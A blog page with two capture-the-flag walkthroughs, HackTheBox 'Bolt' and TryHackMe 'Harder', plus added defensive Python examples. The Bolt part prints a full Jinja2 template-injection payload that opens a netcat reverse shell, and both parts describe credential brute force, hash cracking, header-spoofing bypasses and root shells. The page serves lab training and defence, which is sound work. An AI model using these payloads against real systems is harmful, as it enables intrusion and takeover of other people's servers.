Showing posts with the label gpg.

Sunday, February 20, 2022

Bolt HackTheBox Writeup


Scanning

We run nmap on all ports with scripts and software versions.

Enumeration

We put the subdomain in the /etc/hosts file and access the web resource.

We access the resource through port 443 and find a passbolt deployed.

We need an invitation to use it.

Exploitation

We use hydra on the "bolt.htb/admin" authentication panel and obtain the administrator credentials.

We access with the credentials and go to the mail.

We see that they are having a conversation in which they have uploaded a Docker image to the server.

We fuzz virtual hosts with wfuzz and find these subdomains:

Roundcube

Create account bolt.htb

Download image.tar

We extract the files and find a SQLite database.

Hash cracking

We use grep to search for the invitation code and find a file that exposes it.

We register an account and use the invitation code.

We also have access to email.

In testing, we found that it is vulnerable to SSTI (Server-Side Template Injection).

PoC

Result for mail

We insert the payload in the name change and apply the changes.

{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.XX.XX 443 >/tmp/f')|attr('read')()}}

We will receive an email, so we will set a netcat to listen and click on it.
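As an added example (not part of the writeup), a small Python checker a defender could run over submitted profile fields: it undoes the URL and \xNN hex escapes that the payload above uses to hide the dunder names, then flags template delimiters, the attr filter and the object-graph names that only appear in an SSTI attempt. The sample form is constructed.

```python
import re
from urllib.parse import unquote

# Names that only show up in a profile field when someone is walking the
# Python object graph from inside a Jinja2 template (constructed list).
DANGEROUS_ATTRS = ("__globals__", "__builtins__", "__import__",
                   "__subclasses__", "popen", "system")

def normalize(value: str) -> str:
    """Undo URL encoding and \\xNN escapes (e.g. \\x5f -> '_')."""
    value = unquote(value)
    return re.sub(r"\\x([0-9a-fA-F]{2})",
                  lambda m: chr(int(m.group(1), 16)), value)

def ssti_indicators(value: str) -> list[str]:
    """Return the indicators found in one field, [] if it looks clean."""
    norm = normalize(value)
    found = []
    if "{{" in norm or "{%" in norm:
        found.append("template-delimiters")
    if re.search(r"\|\s*attr\s*\(", norm):
        found.append("attr-filter")
    for name in DANGEROUS_ATTRS:
        if name in norm:
            found.append(name)
    return found

def scan_form(form: dict[str, str]) -> dict[str, list[str]]:
    """Scan every field; only fields with indicators appear in the result."""
    return {k: ind for k, v in form.items() if (ind := ssti_indicators(v))}

# Constructed sample mirroring the profile-name change in the writeup.
SAMPLE_FORM = {
    "name": "{{request|attr('application')|attr('\\x5f\\x5fglobals\\x5f\\x5f')}}",
    "email": "eddie@bolt.htb",
}

if __name__ == "__main__":
    print(scan_form(SAMPLE_FORM))
```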

Reverse shell

We do a reconnaissance and find some credentials in the file "passbolt.php".

We tested these credentials on the user "eddie" and they work!

Privilege Escalation

.config/google-chrome/Default/Local Extension Settings/didegimhafipceonhjepacocaffmoppf/000003.log

We use gpg2john to extract a hash from the file and crack it with john.

Cracking with John

Searching for information, we found through Google this link on how to recover a "Passbolt" account with the GPG key and password. Sound familiar?

https://community.passbolt.com/t/recover-account-on-a-network-without-email/1394

We access the database with the credentials found above.

Select the user "Eddie" and take his ID and token; this is the data we need to build the account recovery link.

Recovery account

https://passbolt.bolt.htb/setup/recover/ID/TOKEN

Access the link, load the gpg file and now enter your password (the one we cracked earlier with john).

Once inside, we can see the root password.

We authenticate as the root user and read the flag.


About

David Utón is a penetration tester and security auditor for web and mobile applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks.

Contact:

David-Uton @David_Uton

Wednesday, June 19, 2019

Harder TryHackMe Writeup


Scanning

We scan the open ports with the nmap tool with scripts and software versions.

Enumeration

We access the web service and find the corporate website and the software they use.

Using the Nikto tool, we find a phpinfo.php file that also helps us list the deployed software and its exact versions.

PHPinfo File

We see in the server response that it reveals a domain name, we add it to our "/etc/hosts" file.

We list an administration panel that asks for credentials.

We try the default credentials "admin:admin" and it lets us through, but we get the following message...

We use dirsearch and several seclist dictionaries, we list some files and directories that might be relevant.

We can't access it from the browser, but we can use the GitTools suite to dump it.

We extract information...

We read the file "index.php", we see that it requires the file "hmac.php".

Contents of file "hmac.php".

The best way to review code is to play with it, so I used a website that runs PHP to debug the code and did a test to get an HMAC hash for a personal host.

<?php
// hash_hmac(algo, data, key): the key is passed as false here, which PHP
// coerces to the empty string, so the tag depends only on the public data.
$secret = hash_hmac('sha256', "m3n0sd0n4ld.github.io", false);
echo $secret;

Now with all the data, we fill in the variables and we see that the site returns a new url and credentials.
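Added example, not from the writeup: the snippet above passes false as the HMAC key, which PHP coerces to an empty string, so anyone who knows the data can reproduce the tag. This Python version reproduces that computation and places it beside a verifier that requires a real key and compares in constant time; the key value is a constructed placeholder.

```python
import hashlib
import hmac

def php_hash_hmac_false_key(data: str) -> str:
    """What hash_hmac('sha256', $data, false) computes: PHP casts the key
    false to "", so the 'secret' is empty and the tag is public knowledge."""
    return hmac.new(b"", data.encode(), hashlib.sha256).hexdigest()

def sign(data: str, key: bytes) -> str:
    """HMAC-SHA256 over the data with the given key, hex encoded."""
    return hmac.new(key, data.encode(), hashlib.sha256).hexdigest()

def verify(data: str, tag: str, key: bytes) -> bool:
    """Refuse an empty key outright and compare tags in constant time."""
    if not key:
        return False
    return hmac.compare_digest(sign(data, key), tag)

# Constructed values: the host from the writeup and a placeholder secret.
HOST = "m3n0sd0n4ld.github.io"
SERVER_KEY = b"constructed-placeholder-secret"

if __name__ == "__main__":
    forged = php_hash_hmac_false_key(HOST)   # computable without any secret
    print("empty-key tag accepted:", verify(HOST, forged, b""))
    print("forged tag vs real key:", verify(HOST, forged, SERVER_KEY))
    print("genuine tag vs real key:", verify(HOST, sign(HOST, SERVER_KEY), SERVER_KEY))
```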

We access the new site, enter the credentials but it seems that it only allows access to a specific network range.

We add the header "X-Forwarded-For: 10.10.10.X" and see that the website opens.
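Added example (not from the writeup) of why an allow-list that trusts X-Forwarded-For from any peer lets a client choose its own source address, beside a resolver that only honours the header when the direct peer is a trusted proxy. The allowed range and proxy address are assumptions.

```python
import ipaddress

# Assumptions (not from the writeup): the range the admin site allows and the
# reverse proxy that is the only legitimate source of X-Forwarded-For.
ALLOWED_NET = ipaddress.ip_network("10.10.10.0/24")
TRUSTED_PROXIES = {ipaddress.ip_address("10.10.10.1")}

def naive_client_ip(remote_addr, headers):
    """Weak pattern: believe X-Forwarded-For no matter who sent it."""
    xff = headers.get("X-Forwarded-For")
    if xff:
        return ipaddress.ip_address(xff.split(",")[0].strip())
    return ipaddress.ip_address(remote_addr)

def client_ip(remote_addr, headers):
    """Honour the header only when the TCP peer is a trusted proxy, and read it
    right to left: each trusted proxy appended the address it actually saw,
    while the leftmost entries are whatever the client chose to send."""
    peer = ipaddress.ip_address(remote_addr)
    xff = headers.get("X-Forwarded-For", "")
    if peer not in TRUSTED_PROXIES or not xff:
        return peer
    for hop in reversed([h.strip() for h in xff.split(",")]):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return peer  # malformed header: fall back to the socket address
        if addr not in TRUSTED_PROXIES:
            return addr
    return peer

def is_allowed(remote_addr, headers, resolver=client_ip):
    """Allow-list check; pass resolver=naive_client_ip to see the bypass."""
    return resolver(remote_addr, headers) in ALLOWED_NET

if __name__ == "__main__":
    spoof = {"X-Forwarded-For": "10.10.10.50"}   # constructed spoofed header
    print("naive:", is_allowed("203.0.113.5", spoof, resolver=naive_client_ip))
    print("hardened:", is_allowed("203.0.113.5", spoof))
```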

Exploitation

Once inside, we see that we can execute system commands.

Read user flag

We see that the shell is "ash", so we adapt the netcat one-liner and get a more or less stable reverse shell.

Reverse shell

We enumerate the machine and find a backup file that contains the credentials of the user "evs".

We connect via SSH to have a more stable session.

Privilege Escalation

Let's remember the file we found with the "evs" credentials (ToDo: create a backup script....)

We use find to list the scripts that we could review.

Nothing there, so we run a test with the "whoami" command: we encrypt it with gpg, run the "execute-crypted" binary and see that it executes as "root".

Great! So now we use netcat again to establish a reverse shell as root: we put it in the "command" file, cat it to check that it is OK, encrypt the file with gpg and run the binary. Below we see that we already have a shell as root and can read the flag.

